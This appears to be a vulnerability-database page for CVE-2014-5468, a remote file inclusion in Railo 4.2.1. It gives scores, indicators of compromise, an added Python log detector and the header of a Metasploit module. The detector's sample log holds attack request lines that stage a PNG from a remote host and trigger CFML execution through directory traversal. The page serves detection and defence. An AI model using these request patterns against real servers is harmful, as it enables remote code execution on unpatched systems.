CVE-2014-5468
Published: 2020-02-07
Priority: P2 (71) · Severity: high (CVSS 3.1 base score 8.8)
Exploit: public exploit available
EPSS: 52.56% (98.8th percentile)
A File Inclusion vulnerability exists in Railo 4.2.1 and earlier via a specially-crafted URL request to the thumbnail.cfm to specify a malicious PNG file, which could let a remote malicious user obtain sensitive information or execute arbitrary code.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getrailo | railo | <= 4.2.1.000 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests to /railo-context/admin/thumbnail.cfm whose 'img' parameter points to a remote URL; this is the remote-file-inclusion (staging) step of the exploit.
- Detect directory traversal in requests to img.cfm where the 'attributes.src' parameter contains '../../../../temp/admin-ext-thumbnails/'; this identifies second-stage payload execution.
- Alert on HTTP 500 responses from the Railo server following a GET to thumbnail.cfm with an external 'img' plus 'height' and 'width' parameters: the exploit expects a 500 to confirm successful staging.
- Detect the 'thistag.executionmode=start' query parameter in requests to img.cfm; it is a specific indicator of the directory-traversal/CFML execution step of this exploit chain.
- The stager is a PNG file with ColdFusion markup (CFML) appended to it; inspect files written to temp/admin-ext-thumbnails/ for CFML content.
- Use the known MD5 of /res/images/id.png (6de48cb72421cfabdce440077a921b25) to fingerprint unpatched Railo 4.2.1 instances during scanning.
- The default TARGETURI for the Metasploit module is '/railo-context/'; deployments with a non-default base URI use a different path prefix, so detections should account for variable base paths.
- The exploit requires SRVHOST to be a routable IP address reachable by the target server; exploitation fails if the attacker host is not reachable from the target, which limits the attack surface to network-reachable scenarios.
- The name used to reference the staged file in temp/admin-ext-thumbnails/ is the MD5 of '<stager_url>-5000-5000' (width and height are hardcoded to 5000), uppercased; detection rules should account for this naming pattern.
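As an added example (not from the page's sources or the Metasploit module), the following Python detector applies the indicators listed above to constructed access-log records and derives the staged-file name pattern. The log format, the sample addresses and the /railo-context/ base path are assumptions; tune the base path to the deployment.

```python
"""Added detection example for the CVE-2014-5468 exploit chain (thumbnail.cfm
staging, then img.cfm traversal). Log records below are constructed samples."""
import hashlib
from urllib.parse import parse_qs, unquote, urlsplit

STAGED_DIR = "temp/admin-ext-thumbnails/"   # directory the stager is written to


def classify(request_line, status, base_path="/railo-context/"):
    """Return the page's indicators matched by one request line and its status."""
    hits = []
    target = request_line.split(" ")[1] if " " in request_line else request_line
    parts = urlsplit(target)
    path = parts.path.lower()
    if not path.startswith(base_path.lower()):
        return hits                          # other base URI: adjust per deployment
    query = parse_qs(parts.query, keep_blank_values=True)
    q = {k.lower(): [unquote(v) for v in vs] for k, vs in query.items()}
    if path.endswith("/admin/thumbnail.cfm"):
        img = q.get("img", [""])[0]
        if img.lower().startswith(("http://", "https://")):
            hits.append("thumbnail.cfm img points to a remote URL (RFI staging)")
            if status == 500 and "height" in q and "width" in q:
                hits.append("HTTP 500 to staging request (the exploit expects this)")
    if path.endswith("/img.cfm"):
        src = q.get("attributes.src", [""])[0]
        if "../" in src and STAGED_DIR in src:
            hits.append("img.cfm traversal into admin-ext-thumbnails (second stage)")
        if q.get("thistag.executionmode", [""])[0].lower() == "start":
            hits.append("thistag.executionmode=start (CFML execution step)")
    return hits


def expected_stager_name(stager_url):
    """Name the exploit uses under temp/admin-ext-thumbnails/: MD5 of
    '<stager_url>-5000-5000', uppercased (per the page); search the directory for it."""
    return hashlib.md5(f"{stager_url}-5000-5000".encode()).hexdigest().upper()


# Constructed access-log records (client, request line, status); addresses are
# from documentation ranges, not real hosts.
SAMPLE_LOG = [
    ("203.0.113.5", "GET /railo-context/admin/thumbnail.cfm?img=http://198.51.100.7:8080/s.png&height=5000&width=5000 HTTP/1.1", 500),
    ("203.0.113.5", "GET /railo-context/admin/img.cfm?attributes.src=../../../../temp/admin-ext-thumbnails/STAGER.png.cfm&thistag.executionmode=start HTTP/1.1", 200),
    ("192.0.2.10", "GET /railo-context/admin/thumbnail.cfm?img=/res/images/id.png&height=64&width=64 HTTP/1.1", 200),
]


def scan(log=SAMPLE_LOG):
    """Return (client, indicators) for every record matching at least one indicator."""
    return [(client, h) for client, req, status in log if (h := classify(req, status))]
```

Run `scan()` over real access-log records converted to the same tuple shape; the third sample record (a local image at the default size) produces no hit, which is the benign baseline.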
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
No detection rules found.
Exploit-DB
Railo 4.2.1 - Remote File Inclusion (Metasploit), published 2014-09-15 (CVE-2014-5468)
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Railo Remote File Include',
      'Description' => %q{
        This module exploits a remote file include vulnerability in Railo,
        tested against version 4.2.1. First, a call using a vulnerable
        line in thumbnail.cfm allows an attacker to download an
        arbitrary PNG file. By appending a .cfm, and taking advantage of
        a directory traversal, an attacker can append ColdFusion markup
        to the PNG file, and have it interpreted by the server. This is
        used to stage and execute a fully-fledged payload.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'Bryan Alexander', # Discovery/PoC
        'bperry'           # me
      ],
      # the rest of the module metadata and the exploit body are not reproduced on this page
```
Metasploit
Railo Remote File Include
This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable line in thumbnail.cfm allows an attacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append ColdFusion markup to the PNG file, and have it interpreted by the server. This is used to stage and execute a fully-fledged payload.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/128234/Railo-4.2.1-Remote-File-Inclusion.html
- http://www.exploit-db.com/exploits/34669
- https://exchange.xforce.ibmcloud.com/vulnerabilities/95959
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2014-5468
- https://www.securityfocus.com/bid/69761